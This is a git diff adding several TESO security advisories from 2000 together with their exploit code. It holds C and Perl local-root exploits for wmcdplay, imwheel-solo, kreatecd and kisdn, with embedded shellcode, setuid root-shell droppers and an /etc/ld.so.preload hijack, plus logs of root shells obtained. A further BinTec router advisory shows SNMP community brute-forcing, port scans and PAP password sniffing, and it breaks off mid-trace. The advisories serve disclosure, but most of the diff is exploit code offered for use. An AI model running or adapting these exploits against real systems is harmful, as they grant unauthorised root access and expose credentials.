+/*** Halloween 4 local root exploit for wmcdplay. Other distros are
+ *** maybe affected as well.
+ *** (C) 2000 by C-skills development. Under the GPL. 
+ *** 
+ *** Bugdiscovery + exploit by S. Krahmer & Stealth.
+ ***
+ *** This exploit was made (possible by|for) the team TESO and CyberPsychotic, the
+ *** OpenBSD-freak. :-) Greets to all our friends. You know who you are.
+ *** 
+ ***
+ *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
+ ***
+ *** other advisories and kewl stuff at:
+ *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
+ ***
+ ***/
+#include <stdio.h>
+
+/* The shellcode can't contain '/' as wmcdplay will exit then.
+ * So i used Stealth's INCREDIBLE hellkit to generate these code! :-)
+ */
+char shell[] =
+"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x68\x80\x36\x01\x46\xe2\xfa"
+"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
+"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xbb\x11"
+"\x01\x01\x8c\xba\x2b\xee\xfe\xfe\x30\xd3\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c"
+"\xf9\xb9\x16\x01\x01\x01\x88\xd7\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
+"\x01\x01\x88\xff\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\x88\xed\x5c\xc2\x91\x91\x91"
+"\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91";
+
+/* filename-buffer plus ret + ebp - defaultpath 
+ */
+#define buflen (256+8 - 28)
+#error "no kids please"
+
+int main(int argc, char **argv)
+{                                                               
+        char *wm[] = {
+                "/usr/X11R6/bin/wmcdplay", 
+                "-f", 
+                "-display", "0:0", /* one might comment this if already running on X; remotely you can
+                                    * give your own server
+                                    */
+                0
+        };
+        
+        char boom[buflen+10];
+        int i = 0, j = 0, ret =  0xbffff796;    /* this address works for me */
+
+        memset(boom, 0, sizeof(boom));
+        memset(boom, 0x90, buflen);
+        if (argc > 1)
+                ret += atoi(argv[1]);
+        else
+                printf("You can also add an offset to the commandline. 40 worked for me on the console.\n");
+        for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
+                boom[i] = shell[j++];
+        *(long*)(&boom[i]) = ret; 
+        
+        printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
+               "Respect other users privacy!\n");
+               
+        execl(wm[0], wm[0], wm[1], boom, wm[2], wm[3], 0);
+        return 0;
+}
diff --git a/advisories/teso-advisory-006/advisory-006.txt b/advisories/teso-advisory-006/advisory-006.txt
new file mode 100644
index 0000000..57dfae2
--- /dev/null
+++ b/advisories/teso-advisory-006/advisory-006.txt
@@ -0,0 +1,157 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+- ------
+
+TESO Security Advisory
+2000/03/13
+
+imwheel local root compromise
+
+
+Summary
+===================
+
+    A vulnerability within the imwheel application for Linux has been
+    discovered. Some of these packages are shipped with an suid-root
+    wrapper-script that invokes the insecure program 'imwheel' with UID 0.
+
+
+Systems Affected
+===================
+
+    Any system which has imwheel-solo wrapper-script installed as set-UID root.
+
+    Among the vulnerable distributions (if the package is installed) are the
+    following systems:
+
+      Halloween Linux Version 4 - imwheel package from the
+                                  powertools/contrib. CD
+
+
+Tests
+===================
+
+    [stealth@liane stealth]$ id
+    uid=500(stealth) gid=500(stealth) groups=500(stealth)
+    [stealth@liane stealth]$ cd imhack/
+    [stealth@liane imhack]$ stat `which imwheel-solo`
+      File: "/usr/X11R6/bin/imwheel-solo"
+      Size: 795          Filetype: Regular File
+      Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
+    Device:  3,1   Inode: 214472    Links: 1
+    Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
+    Modify: Mon Nov  1 23:41:15 1999(00132.17:55:45)
+    Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
+    [stealth@liane imhack]$ cc imexp.c
+    [stealth@liane imhack]$ ./a.out
+    Creating boom-shell...
+    Creating shellcode...
+    You can also add an offset to the commandline.
+    Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
+    Respect other users privacy!
+    Invoking vulnerable program (imwheel-solo)...
+    imwheel is not running as a daemon.
+    imwheel is not checking/writing a pid file, BE CAREFUL!
+    An imwheel may be running already, two or more imwheel processes
+    on the same X display, or using gpm -W, will not operate as expected!
+    imwheel started (pid=1385)
+    Knocking on heavens door...
+    sh-2.03# id
+    uid=0(root) gid=500(stealth) groups=500(stealth)
+    sh-2.03#
+
+
+Impact
+===================
+
+    An attacker may gain local root-access to a system where vulnerable imwheel
+    package is installed. Even if it should not be possible for him to get a
+    root-shell (f.e. due to a non-exec stack-patch) he can use the suid-root
+    perlscript to kill arbitrary processes.
+
+
+Explanation
+===================
+
+    The suid-root perlscript 'imwheel-solo' invokes the 'imwheel' program with
+    EUID 0.
+    Due to inaccurate bounds-checking an internal stack-located buffer can
+    be overflowed by an attacker. The 'imwheel' program doesn't bounds-check
+    the string it gets from the HOME environment variable.
+    Further the wrapper-script which runs privileged can be fooled into sending
+    a SIGTERM signal to arbitrary processes, causing them to die.
+    This problem appears because imwheel-solo blindly trusts any PID given by a
+    world-writable pid-file.
+
+
+Solution
+===================
+
+    The author and the distributor has been informed before.
+    A patch is not yet available. Just remove the suid wrapper-script.
+
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to S. Krahmer [1].
+    The shell-code is due to Stealth.
+
+    This advisory has been written by S. Krahmer.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at https://teso.scene.at/
+    
+    C-Skills developers may be reached through [1].
+
+
+References
+===================
+
+    [1] S. Krahmer, C-Skills
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [2] TESO
+        http://teso.scene.at or https://teso.scene.at/
+        
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/ or https://teso.scene.at/
+
+    and
+        
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+- ------
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE4zpugcZZ+BjKdwjcRAjFrAJ94U2wicQsueZ7SdbelfcxHatqyDACfUTT8
+bRCC41Ikx6h0NQZZx1JoT60=
+=/R6+
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-006/imexp.c b/advisories/teso-advisory-006/imexp.c
new file mode 100644
index 0000000..28fc69b
--- /dev/null
+++ b/advisories/teso-advisory-006/imexp.c
@@ -0,0 +1,94 @@
+/*** Halloween 4 local root exploit for imwheel-solo. Other distros are
+ *** maybe affected as well.
+ *** (C) 2000 by C-skills development. Under the GPL. 
+ *** 
+ *** Bugdiscovery + exploit by S. Krahmer & Stealth.
+ ***
+ *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
+ ***
+ *** other advisories and kewl stuff at:
+ *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
+ ***
+ ***/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <errno.h>
+
+
+
+/* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
+ */
+char shell[] =
+"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01\x46\xe2\xfa"
+"\xea\x0d\x2e\x75\x6c\x71\x2e\x63\x6e\x6e\x6c\x72\x69\x01\x80\xed"
+"\x66\x2a\x01\x01\x54\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xab\x11"
+"\x01\x01\x30\xc8\x8c\xb2\x3b\xee\xfe\xfe\xb9\xb7\x01\x01\x01\x88\xcb\x52\x88"
+"\xf2\xcc\x81\xb8\xec\x08\x01\x01\xb9\x0e\x01\x01\x01\x52\x88\xf2\xcc\x81\x30"
+"\xc1\x5a\x5f\x88\xed\x5c\xc2\x91\x91\x91\x91\x91\x91\x91\x91";
+
+
+/* filename-buffer plus ret + ebp
+ */
+#define buflen (2048+8)
+
+int main(int argc, char **argv)
+{                                                               
+        char *im[] = {
+                "/usr/X11R6/bin/imwheel-solo", 
+                0
+        };
+        char *a[] = {
+                "/tmp/boomsh",
+                0
+        };
+        FILE *f;
+        struct stat s;  
+        char boom[buflen+10];
+        int i = 0, j = 0, ret =  0xbfffee68;    /* this address works for me */
+
+        if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
+                perror("fopen");
+                exit(errno);
+        }
+        printf("Creating boom-shell...\n");
+        fprintf(f, "int main() {char *a[]={\"/bin/sh\",0};\nsetuid(0);\nexecve(*a, a, 0);\nreturn 0;}\n");
+        fclose(f);
+        system("cc /tmp/boomsh.c -o /tmp/boomsh");
+
+        printf("Creating shellcode...\n");
+        memset(boom, 0, sizeof(boom));
+        memset(boom, 0x90, buflen);
+        if (argc > 1)
+                ret += atoi(argv[1]);
+        else
+                printf("You can also add an offset to the commandline.\n");
+        for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
+                boom[i] = shell[j++];
+        *(long*)(&boom[i]) = ret; 
+        
+        printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
+               "Respect other users privacy!\n");
+        
+        setenv("HOME", boom, 1);
+        setenv("DISPLAY", ":0", 1);
+        
+        printf("Invoking vulnerable program (imwheel-solo)...\n");
+        if (fork() == 0) {
+                execl(im[0], im[0], im[1], im[2], 0);
+        }
+        sleep(4);
+        
+        memset(&s, 0, sizeof(s));
+        stat("/tmp/boomsh", &s);
+        if ((S_ISUID & s.st_mode) != S_ISUID) {
+                printf("Boom-shell not SUD-root! Wrong offset or patched version of imwheel.\n");
+                return -1;
+        }
+        /* Huh? :-)
+         */
+        printf("Knocking on heavens door...\n");
+        execve(a[0], a, 0);
+        return 0;
+}
diff --git a/advisories/teso-advisory-007/advisory-007.txt b/advisories/teso-advisory-007/advisory-007.txt
new file mode 100644
index 0000000..f569076
--- /dev/null
+++ b/advisories/teso-advisory-007/advisory-007.txt
@@ -0,0 +1,154 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+- ------
+
+TESO Security Advisory
+2000/03/14 
+
+kreatecd local root compromise
+
+
+Summary
+===================
+
+    A vulnerability within the kreatecd application for Linux has been 
+    discovered. An attacker can gain local root-access.
+
+
+Systems Affected
+===================
+
+    Any system which has kreatecd installed as set-UID root.
+    This affects also a configure; make; make install procedure.
+
+    Among the vulnerable distributions (if the package is installed) are the
+    following systems:
+
+      Halloween Linux Version 4
+      SuSE 6.x
+
+
+Tests
+===================
+
+    [stealth@liane stealth]$ stat `which kreatecd`
+      File: "/usr/bin/kreatecd"
+      Size: 229068       Filetype: Regular File
+      Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
+    Device:  3,1   Inode: 360053    Links: 1
+    Access: Tue Mar 14 14:48:21 2000(00000.00:00:45)
+    Modify: Tue Mar 14 14:48:21 2000(00000.00:00:45)
+    Change: Tue Mar 14 14:48:21 2000(00000.00:00:45)
+    [stealth@liane stealth]$ id
+    uid=500(stealth) gid=500(stealth) groups=500(stealth)
+    [stealth@liane stealth]$ /tmp/kreatur
+    (... some diagnostic messages ...)
+    Creating suid-maker...
+    Creating boom-shell...
+
+    Execute kreatecd and follow the menus:
+    Configure -> Paths  -- change the path for cdrecord to /tmp/xxx
+    Apply -> OK
+    Configure -> SCSI -> OK
+
+    Execute /tmp/boomsh
+
+    
+    BEHAVE!
+       
+    (poking around with GUI...)
+    [stealth@liane stealth]$ /tmp/boomsh
+    [root@liane stealth]# id
+    uid=0(root) gid=500(stealth) groups=500(stealth)
+    [root@liane stealth]#
+
+
+Impact
+===================
+
+    An attacker may gain local root-access to a system where vulnerable 
+    kreatecd package is installed. It might be difficult for an remote-
+    attacker who gained local user-access due to the GUI-nature of
+    the vulnerable program.
+    I appreciate help with some tips how one can get an instant rootshell
+    without clicking around.
+    
+
+Explanation
+===================
+
+    Kreatecd which runs with the saved user-id of 0 blindly trusts path's to
+    cd-recording software given by unprivileged user.
+    It then invokes this software with EUID of 0 when user just clicks a little
+    bit around with the menus.
+
+
+Solution
+===================
+
+    The author and the distributor has been informed before.
+    Remove the suid bit of kreatecd.
+
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to S. Krahmer [1].
+    This advisory has been written by S. Krahmer.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at https://teso.scene.at/
+    
+    C-Skills developers may be reached through [1].
+
+
+References
+===================
+
+    [1] S. Krahmer, C-Skills
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [2] TESO
+        http://teso.scene.at or https://teso.scene.at/
+        
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/ or https://teso.scene.at/
+
+    and
+        
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+- ------
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE4zpvYcZZ+BjKdwjcRAtukAJwLRMYT1S2FLZriifUmm+vnVznSfQCgk4m9
+9FRbu1gyyI6rbR38XP1F+sk=
+=L5Ak
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-007/kreatur b/advisories/teso-advisory-007/kreatur
new file mode 100755
index 0000000..868d622
--- /dev/null
+++ b/advisories/teso-advisory-007/kreatur
@@ -0,0 +1,66 @@
+#!/usr/bin/perl
+
+# kreatecd local root-exploit helper script.
+# Tested on Halloween 4 distro. Will also work on SuSE 6.x
+# (C) 2000 C-skills development, S. Krahmer under the GPL
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+#
+# visit TESO at http://teso.scene.at/ or https://teso.scene.at/
+#
+
+# ! USE IT AT YOUR OWN RISK !
+# For educational purposes only.
+
+if (((stat "/opt/kde/bin/kreatecd")[2] & 04000) != 04000 && 
+    ((stat "/usr/bin/kreatecd")[2] & 04000) != 04000)  {
+        print "kreatecd not installed suid! handshake with root!\n";
+        exit 1;
+}
+
+print "kreatecd installed suid!\n";
+print "Contact your local script-kiddie.\n";
+print "Nobody ever got fired for NOT using GUI-suid-rootprograms! remove it!\n";
+print "Creating suid-maker...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <stdio.h>
+#include <sys/types.h>
+#include <unistd.h>
+int main()
+{
+        setreuid(0,0);
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 04755);
+        exit(1);
+}
+_EOF_
+close O;
+system("cc /tmp/boom.c -o /tmp/xxx");
+
+print "Creating boom-shell...\n";
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c..)";
+print O<<_EOF2_;
+
+int main()
+{
+        char *a[] = {
+                "/bin/bash",
+                0
+        };
+        setuid(0); 
+        execve(*a, a, 0);
+        return 0;
+}
+_EOF2_
+close O;
+system("cc /tmp/boomsh.c -o /tmp/boomsh");
+print <<_EOF3_;
+\nExecute kreatecd and follow the menus:
+Configure -> Paths  -- change the path for cdrecord to /tmp/xxx
+Apply -> OK
+Configure -> SCSI -> OK
+\nExecute /tmp/boomsh\n
+\nBEHAVE!\n
+_EOF3_
+
diff --git a/advisories/teso-advisory-008/advisory-008.txt b/advisories/teso-advisory-008/advisory-008.txt
new file mode 100644
index 0000000..76f576a
--- /dev/null
+++ b/advisories/teso-advisory-008/advisory-008.txt
@@ -0,0 +1,155 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+- ------
+
+TESO Security / C-Skills development Security Advisory
+2000/03/13
+
+kisdn local root compromise
+
+
+Summary
+===================
+
+    A bug within the kisdn application for Linux has been discovered.
+    A local attacker may gain root privileges by exploiting a symlink
+    vulnerability in the kisdn, which is part of the KDE suite.
+    
+
+Systems Affected
+===================
+
+    Any system which has kisdn 0.7.3-2 installed setuid-root.
+
+    Among the vulnerable distributions (if the package is installed) are the
+    following systems:
+
+      Halloween Linux Version 4 
+      
+
+Tests
+===================
+
+    [stealth@liane stealth]$ id
+    uid=500(stealth) gid=500(stealth) groups=500(stealth)
+    [stealth@liane stealth]$ export DISPLAY=":0"
+    [stealth@liane stealth]$ cd kisdn-hack
+    [stealth@liane kisdn-hack]$ ./killer
+    Warning. You will loose kisdnrc file and /etc/ld.so.preload!
+    <enter>
+
+    Linking /home/stealth/.kde/share/config/kisdnrc...
+    Creating hijack-lib ...
+    Compiling hijack-lib ...
+    Compile shell...
+    You don't need to click. Just wait a few seconds.
+    kISDN: Release 0.7.3
+    Welcome. But as always: BEHAVE!
+    sh-2.03# id
+    uid=0(root) gid=500(stealth) groups=500(stealth)
+    sh-2.03#
+
+
+Impact
+===================
+
+    An attacker may gain local root-access to a system where vulnerable kisdn
+    package is installed. 
+    Due to the GUI-nature of the program it might be difficult for an attacker
+    to gain a root-shell on a remote-system. However he could modify the
+    DISPLAY environment variable to redirect the output to one of his machines.
+                
+    
+
+Explanation
+===================
+
+    The checkKisdnrc() function which should check for proper permissions
+    and possible sysmlink's fails due to a not evaluated variable 'valid'
+    at the end of the function. Rather the function assumes that all is OK
+    when just a local config-file exists which must be created as root.
+    An attacker however can assume that this file has been created by root
+    via the 'kcmkisdn' utility (which sets up the necessary drivers etc)
+    since otherwise nobody can use the kisdn-program.
+    Even if root has not configured kisdn via this utility, due to a race
+    in checkKisdnrc() an attacker can quickly create a symlink after
+    a successful return of the function.            
+    Even more the kisdn program has some potential security-risks by calling
+    the 'modprobe' utility via the system(3) call. This might enable
+    an attacker to give additional input to the shell that is invoked by
+    system(3).
+        
+
+Solution
+===================
+
+    The author and the distributor have been informed before.
+    A patch is not yet available.
+        
+    Temporary Solution:
+    Remove kisdn's s-bit.
+    
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to S. Krahmer [1].
+
+    This advisory has been written by S. Krahmer and hendy.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at http://teso.scene.at/
+    
+    C-Skills developers may be reached through [1].
+
+
+References
+===================
+
+    [1] S. Krahmer, C-Skills
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [2] TESO
+        http://teso.scene.at or https://teso.scene.at/
+        
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    links [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/ or https://teso.scene.at/
+
+    and
+        
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+- ------
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE40ifpcZZ+BjKdwjcRAr4UAJ94lfxiWU7S74ostUGE3U6lIyA7bgCeLG/6
+hNcWIjwNiyL10NtDqtJc55E=
+=+vBE
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-008/killer b/advisories/teso-advisory-008/killer
new file mode 100755
index 0000000..4ed5bac
--- /dev/null
+++ b/advisories/teso-advisory-008/killer
@@ -0,0 +1,91 @@
+#!/usr/bin/perl
+
+# KISDN local root
+# (C) 2000 by C-Skills development, Sebastian Krahmer
+# KISDN is suid root (GUI!) and trusts symlinks.
+#
+# This exploit is part of a security-advisory:
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+# 
+# BIG greets to:
+#
+# security.is people :) 
+# teso security
+# Mr. Russian Smartass: Fyodor }|-]
+# lam3rz :P
+# Silvio
+# and some auditors from bigger distributors :)
+# (and all i forgot)
+
+# This exploit is for educational purposes only.
+# YOU USE IT AT YOUR OWN RISK!
+# Licensed under the GPL.
+
+# note about these preload-exploits:
+# It is save to run a mc or somewhat on a second terminal, since you won't
+# be able to 'rm' a up-fucked /etc/ld.so.preload! Use F8 on mc then.
+#
+
+print "Warning. You will loose kisdnrc file and /etc/ld.so.preload!\n";
+print "<enter>\n";
+<STDIN>;
+my $rcfile=$ENV{'HOME'}."/.kde/share/config/kisdnrc";
+print "Linking $rcfile...\n";
+unlink $rcfile;
+symlink "/etc/ld.so.preload", $rcfile;
+
+print "Creating hijack-lib ...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <sys/types.h>
+
+int time(void *v)
+{
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 06755);
+        unlink("/etc/ld.so.preload");
+        exit(1);
+}
+_EOF_
+close O;
+
+print "Compiling hijack-lib ...\n";
+$foo = `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
+$foo = `cc -shared /tmp/boom.o -o /tmp/boom.so`;
+
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
+print O<<_EOF2_;
+#include <stdio.h>
+int main() 
+{
+    char *a[] = {"/bin/sh", 0};
+    setuid(0); 
+    system("killall -9 kisdn");
+    execve(a[0], a, 0);
+    return 0;
+}
+_EOF2_
+close O;
+
+print "Compile shell...\n";
+$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;
+
+umask 0;
+
+if (($pid = fork()) == 0) {
+        $foo = `kisdn`;
+        exit(1);
+} 
+print "You don't need to click. Just wait a few seconds.\n";
+sleep(3);
+
+open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
+print O "/tmp/boom.so";
+close O;
+
+$foo = `/usr/bin/passwd`;
+
+# let it look like if we have sth. to do. :)
+sleep 3;
+print "Welcome. But as always: BEHAVE!\n";
+system("/tmp/boomsh");
diff --git a/advisories/teso-advisory-009/advisory-009.txt b/advisories/teso-advisory-009/advisory-009.txt
new file mode 100644
index 0000000..df9f089
--- /dev/null
+++ b/advisories/teso-advisory-009/advisory-009.txt
@@ -0,0 +1,405 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+- ------
+
+TESO Security Advisory
+2000/03/30
+
+BinTec router security and privacy weakness
+
+
+Summary
+===================
+
+    By using SNMP brute-force-techniques for SNMP community-names one is able
+    to gain the management accounts passwords, which are the same as the SNMP
+    community names.
+    Additionally the MIB-Tree holds security related information which should
+    not be accessible through read-only/SNMP. These routers also offer services
+    which can be abused rather easily, like dialing out and getting full line
+    access via a CAPI interface, or a debugging interface which gives you all
+    information which is sent over the BRI-lines.
+    (Those services are open as default and the debugging service is barely
+    documented)
+
+
+Systems Affected
+===================
+
+    BinTec ISDN router family
+
+    tested: BIANCA/BRICK-XL
+            BIANCA/BRICK-XS
+
+
+Tests
+===================
+
+
+    (1) Example system setup for examples given
+    ___________________________________________________________________________
+
+
+    admin Login Password/SNMP Community  bitkoenig
+    read  Login Password/SNMP Community  rince
+    write Login Password/SNMP Community  guenthi
+
+    defaults are: admin/bintec read/public and write/public
+
+
+    (2) Example of Read-Only SNMP output from a BinTec router
+    ___________________________________________________________________________
+
+
+    syslog:
+    bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
+    [...]
+    enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
+     local IP address is 195.202.40.124, remote is 195.202.32.121"
+    enterprises.272.4.1.12.1.4.954440116.7.40 =
+     "LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
+    enterprises.272.4.1.12.1.4.954440685.7.41 =
+     "LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
+    enterprises.272.4.1.12.1.4.954440692.7.42 =
+     "citykom-muenster: outgoing connection closed, duration 583 sec, 18194
+      bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
+    enterprises.272.4.1.12.1.4.954440692.7.43 =
+     "ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
+      609910,7/0,0,0B,citykom-muenster"
+    [...]
+
+    capi-user-db:
+    bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
+    enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
+     /* username */
+    enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
+     /* password */
+    enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
+     /* capi access activated */
+
+
+    (3) Remote CAPI Server on a BinTec router
+    ___________________________________________________________________________
+
+ 
+    fefe:> ps -elf
+    [...]
+    S     0    26     1  28        0   Jan  1 ?        00:00 00:00 vcapid
+    [...]
+
+    Corresponding Port:
+    
+    bitch:~# nmap -sS -O -p 6000 poor.brick.de
+
+    Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
+    Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
+    Port    State       Protocol  Service
+    6000    open        tcp        X11
+
+    TCP Sequence Prediction: Class=random positive increments
+                        Difficulty=1894 (Medium)
+
+    Remote operating system guess:
+    Bintec Brick XS SW Release 4.9.1 ISDN access router
+
+    Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
+
+
+    (4) BrickTrace Server on a BinTec router:
+    ___________________________________________________________________________
+
+
+    fefe:> ps -elf
+    [...]
+    S     0    24     1  28        0   Jan  1 ?        00:04 00:01 traced
+    [...]
+
+    Corresponding Port:
+
+    bitch:~# nmap -sS -O -p 7000 poor.brick.de
+
+    Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
+    Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
+    Port    State       Protocol  Service
+    6000    open        tcp        afs3-fileserver
+
+    TCP Sequence Prediction: Class=random positive increments
+                        Difficulty=1894 (Medium)
+
+    Remote operating system guess:
+    Bintec Brick XS SW Release 4.9.1 ISDN access router
+
+    Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
+
+
+    (5) BrickTracing a password from an outgoing PPP connection
+    ___________________________________________________________________________
+
+
+    bitch:~$ bricktrace -h2pi 1 0 2
+    bricktrace: Connected to 192.168.0.1(7000)
+    Tracing: Channel 1 Unit 0 Slot 2          /* Tracing the B-Channel */
+    [...]
+    020721.320 X DATA[0025]
+          0000: ff 03 c0 23 01 01 00 15  08 73 68 6f 6c 74 77 69  ...#.....user
+          0010: 73 07 72 65 74 68 6f 6f  6f                       .password
+             PPP packet protocol 0xc023 (PAP)
+             ID 1 PAP Authenticate-Request Peer-ID user Password password
+        A=FF  UI
+    [...]
+
+
+    (6) Snooping an S0 Bus for telephone calls
+    ___________________________________________________________________________
+
+
+    bitch:~$ bricktrace -h3 0 0 2
+    bricktrace: Connected to 192.168.0.1(7000)
+    Tracing: Channel 0 Unit 0 Slot 2        /* Tracing the D-Channel */
+    [...]
+    021096.656 R DATA[0015]
+          0000: 02 b3 10 1a 08 01 81 0d  18 01 89 1e 02 82 88 ...............
+            PD=08 Dest CR=01  SETUP ACKNOWLEDGE
+                IE-Element  : Channel Identification :
+                              Interface implicitly identified
+                              Interface type S0
+                              Channelnumber is exclusive (accept only this)
+                              Identified Channel is not D-Channel
+                              Selected Channel : B1-Channel
+                IE-Element  : Progress Indicator reports
+                              In-band information now available
+    [...]
+    021105.366 R DATA[0008]
+          0000: 02 b3 12 2e 08 01 81 02                           ........
+            PD=08 Dest CR=01  CALL PROCEEDING
+    021108.076 R DATA[0012]
+          0000: 02 b3 14 2e 08 01 81 01  1e 02 82 88              ............
+            PD=08 Dest CR=01  ALERT
+                IE-Element  : Progress Indicator reports
+                              In-band information now available
+    [...]
+    021124.748 R DATA[0028]
+          0000: 02 b3 16 2e 08 01 81 07  29 05 00 03 1e 12 23 4c  ........).....#L
+          0010: 0b 21 83 31 33 30 31 31  32 31 31 32              .!.130112112
+            PD=08 Dest CR=01  CONNECT
+                IE-Element  : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
+                IE-Element  : Unknown IE-Element 0x4c in Codeset 0
+   [...]
+   021130.282 R DATA[0045]
+         0000: 02 b3 1a 32 08 01 81 4d  1c 16 91 a1 13 02 02 c4   ...2...M........
+         0010: 37 02 01 22 30 0a a1 05  30 03 02 01 00 82 01 01   7.."0...0.......
+         0020: 28 0b 30 20 45 69 6e 68  65 69 74 65 6e            (.0 Einheiten
+            PD=08 Dest CR=01  RELEASE
+                IE-Element  : Facility
+                              Service discriminator is supplement. application
+                              Component tag is invoke
+                                integer (0x2)
+                                50231
+                                integer (0x1)
+                                34
+                                sequence (0xa)
